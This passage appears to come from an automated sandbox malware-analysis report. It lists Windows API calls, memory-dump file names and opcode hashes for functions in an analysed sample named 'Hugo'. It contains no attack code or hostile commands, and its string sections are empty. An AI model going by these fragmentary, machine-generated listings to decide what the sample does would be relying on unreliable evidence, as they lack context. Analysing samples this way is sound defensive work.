                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 357397906-0
                                                                                                                                                                                                              • Opcode ID: 8b495493eb65bf48a756706fb06e7425261489fe4b6b5c94ce210541585aaea8
                                                                                                                                                                                                              • Instruction ID: ca5dd5054e048796448d6d687d69e5e615b650d16342e21996086c04490c9db3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b495493eb65bf48a756706fb06e7425261489fe4b6b5c94ce210541585aaea8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA1160B9D0020DAFDB01CFA8C884AEEBBB9FF09310F108066E915E2610D735AA51DF50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F73712
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F73723
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00F7372A
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F73731
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2710830443-0
                                                                                                                                                                                                              • Opcode ID: 6caf1fb2b03d87bb66465cf59224a27fcdfada30af9b0920eba09a80cf05ac72
                                                                                                                                                                                                              • Instruction ID: 5825216e2a6df1afbc5c1604baf616b957022665f9a46a5ae7b3fdafd6d10a90
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6caf1fb2b03d87bb66465cf59224a27fcdfada30af9b0920eba09a80cf05ac72
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6E06DF25052287ADA241BA29C4DEEB7F6CDB43BA1F00001AF10AD2480DAA08941F6B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F11F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F11F87
                                                                                                                                                                                                                • Part of subcall function 00F11F2D: SelectObject.GDI32(?,00000000), ref: 00F11F96
                                                                                                                                                                                                                • Part of subcall function 00F11F2D: BeginPath.GDI32(?), ref: 00F11FAD
                                                                                                                                                                                                                • Part of subcall function 00F11F2D: SelectObject.GDI32(?,00000000), ref: 00F11FD6
                                                                                                                                                                                                              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00FA92E3
                                                                                                                                                                                                              • LineTo.GDI32(?,?,?), ref: 00FA92F0
                                                                                                                                                                                                              • EndPath.GDI32(?), ref: 00FA9300
                                                                                                                                                                                                              • StrokePath.GDI32(?), ref: 00FA930E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1539411459-0
                                                                                                                                                                                                              • Opcode ID: 7da1ad8b07924a241e832034430857adc246c9c5adfa28a14f5752832559798f
                                                                                                                                                                                                              • Instruction ID: 05ff022fb730b50467f20986545fe04caed96b2f1674a11350965d1dea726deb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da1ad8b07924a241e832034430857adc246c9c5adfa28a14f5752832559798f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1F0FE7100525DBADB125F54AC0EFCE3F69AF0B320F148100FA16650E2C7B59562BBA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSysColor.USER32(00000008), ref: 00F121BC
                                                                                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 00F121C6
                                                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00F121D9
                                                                                                                                                                                                              • GetStockObject.GDI32(00000005), ref: 00F121E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4037423528-0
                                                                                                                                                                                                              • Opcode ID: 65a71789bfc332ec87c37d443d4f4d8ad672c107161d2ca30a645e16fe96f0ad
                                                                                                                                                                                                              • Instruction ID: 51e320644591537ff16551e08c5cbf458d7fb87504ec4c27baca351cce6e80d8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65a71789bfc332ec87c37d443d4f4d8ad672c107161d2ca30a645e16fe96f0ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CE06571640244AEDB215B74AC09BE87B11AB13336F148219F7B6540E0C7714645BB10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00F6EC36
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00F6EC40
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F6EC60
                                                                                                                                                                                                              • ReleaseDC.USER32(?), ref: 00F6EC81
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                                                                                              • Opcode ID: 6829d7e0cad44c1461ef042b1b816e6ad633ddb334528f980a2bb30d33b8d235
                                                                                                                                                                                                              • Instruction ID: 88f598bddf334bf6896e5671c47f1e2aa9b65a333b22726ebc5946c87a0aff9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6829d7e0cad44c1461ef042b1b816e6ad633ddb334528f980a2bb30d33b8d235
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57E01AB5C00208DFCB40AFA0D908A9DBBB1EB48310F108409E84BE3750C7385942FF00
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00F6EC4A
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00F6EC54
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F6EC60
                                                                                                                                                                                                              • ReleaseDC.USER32(?), ref: 00F6EC81
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                                                                                              • Opcode ID: 90f1024c5aa28994b8b30a26ab92a40ff4e4d9ea02f6f1b97968d92c795655cf
                                                                                                                                                                                                              • Instruction ID: 1d046e8759ecc0882dc2b22eea929d01fb06ce9e2544632fac3bf09052ae2138
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90f1024c5aa28994b8b30a26ab92a40ff4e4d9ea02f6f1b97968d92c795655cf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53E012B5C00208EFCB40AFA0D908A9DBBB1AB48310B108409E84AE3750CB386A02AF00
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F141EA: _wcslen.LIBCMT ref: 00F141EF
                                                                                                                                                                                                              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00F85919
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Connection_wcslen
                                                                                                                                                                                                              • String ID: *$LPT
                                                                                                                                                                                                              • API String ID: 1725874428-3443410124
                                                                                                                                                                                                              • Opcode ID: 4bcf2cf8af4c5b6a2fe4fafaac9a25f4461b6ae7412112b09da70421b0e8bf54
                                                                                                                                                                                                              • Instruction ID: db0ffc3a5ac5752e82c64ce0a47731c9ba3d4de9e15e7ae265962cf5354884b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bcf2cf8af4c5b6a2fe4fafaac9a25f4461b6ae7412112b09da70421b0e8bf54
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C916B75A006049FCB14EF54C8D4EEABBF1AF44714F188099E84A9F362C775EE85EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00F3E67D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                                                                              • String ID: pow
                                                                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                                                                              • Opcode ID: f76400be5148e9cb24054da7d1d4ed25a908f5a3e5903d06ad8f94e62811fb5c
                                                                                                                                                                                                              • Instruction ID: e8c045e10aa6558a5ef3cab45b944209666309cdb3a55466b2704344388f8fd7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f76400be5148e9cb24054da7d1d4ed25a908f5a3e5903d06ad8f94e62811fb5c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99517F61E2810686D7157714CD4237E3FA4AF907B0F304D5AF892422E8EF358D97BE46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: #
                                                                                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                                                                                              • Opcode ID: 44cbf437ef94ad3e701f2919b3d5c095ec3aecc2863459b7205f7cece2f3bbf9
                                                                                                                                                                                                              • Instruction ID: 95f217a88cdeaa97eaa6e4a7056d364b7fcdafb0225c6d4efb4123b7f05d7dcb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44cbf437ef94ad3e701f2919b3d5c095ec3aecc2863459b7205f7cece2f3bbf9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD512131904256DFCB25DF28D441AFA7BA0EF15360F68415AE8919B290DF389D83EB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00F2F6DB
                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F2F6F4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                                                                                                                              • Opcode ID: cf2c90e3e81b98992aa43bec4bbe470c8540d55837f0bd390d3c3c4ea68aae65
                                                                                                                                                                                                              • Instruction ID: a9858dfbde26a9c124cb7c84186034730995bb0e3e0f94a0bdc33816a7b9b176
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf2c90e3e81b98992aa43bec4bbe470c8540d55837f0bd390d3c3c4ea68aae65
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69514771518748ABD320AF14DC86BABBBF8FF84340F81885EF1D9421A1DF348569DB66
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                              • String ID: CALLARGARRAY
                                                                                                                                                                                                              • API String ID: 157775604-1150593374
                                                                                                                                                                                                              • Opcode ID: 04cb6f8930cd2537536c52e148e3d47211fdebf00f98e89edcb8cb1933b8c3ea
                                                                                                                                                                                                              • Instruction ID: 3e02d65079346d685296f175a9e64cf2791cf637d60b4517c52e83d17353ceef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04cb6f8930cd2537536c52e148e3d47211fdebf00f98e89edcb8cb1933b8c3ea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D541AE71E002199FDF04EFA8C8919EEBBB5FF59364F104129E406EB251E7749D81EBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F8DB75
                                                                                                                                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F8DB7F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CrackInternet_wcslen
                                                                                                                                                                                                              • String ID: |
                                                                                                                                                                                                              • API String ID: 596671847-2343686810
                                                                                                                                                                                                              • Opcode ID: 7cdd7ee6f66f452993196c25b0b6473f5295f36af25db9d1e1d53b130af1024d
                                                                                                                                                                                                              • Instruction ID: c680a0cce675389f9f8562c386ab7e0e7b64d83a34029ed36dfdc3a81a40b691
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cdd7ee6f66f452993196c25b0b6473f5295f36af25db9d1e1d53b130af1024d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B316F72C01109ABCF05EFA4CD85EEE7FB9FF15354F100025F815A6162EB759946EB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00FA40BD
                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00FA40F8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$DestroyMove
                                                                                                                                                                                                              • String ID: static
                                                                                                                                                                                                              • API String ID: 2139405536-2160076837
                                                                                                                                                                                                              • Opcode ID: 044e041e22652550607aef83beab1b79e27150c1b2da648ce60726992c23fdba
                                                                                                                                                                                                              • Instruction ID: 6383a914c7ed68f28337e34541a0da0c705236e66abcd791f3a0e2a7e018ea46
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044e041e22652550607aef83beab1b79e27150c1b2da648ce60726992c23fdba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D531A1B1510604AADB14DF78CC80FFB77A9FF89760F008619F995C7190DA75AC81EB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00FA50BD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FA50D2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                              • String ID: '
                                                                                                                                                                                                              • API String ID: 3850602802-1997036262
                                                                                                                                                                                                              • Opcode ID: f97d639ddb757cc5ae2bfd69eadba987e37d20affd12a5a52cbe49c9ae43298b
                                                                                                                                                                                                              • Instruction ID: 939b18a0cab4098c3d5fb5ed5f0c49580172cdfcba713a18fed91aef8b9ab9e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f97d639ddb757cc5ae2bfd69eadba987e37d20affd12a5a52cbe49c9ae43298b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71314CB5A0070AAFDB14CFA5C880BDE7BB5FF4A710F108069E904AB391D771A945DF90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F17873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F178B1
                                                                                                                                                                                                                • Part of subcall function 00F17873: GetStockObject.GDI32(00000011), ref: 00F178C5
                                                                                                                                                                                                                • Part of subcall function 00F17873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F178CF
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00FA4216
                                                                                                                                                                                                              • GetSysColor.USER32(00000012), ref: 00FA4230
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
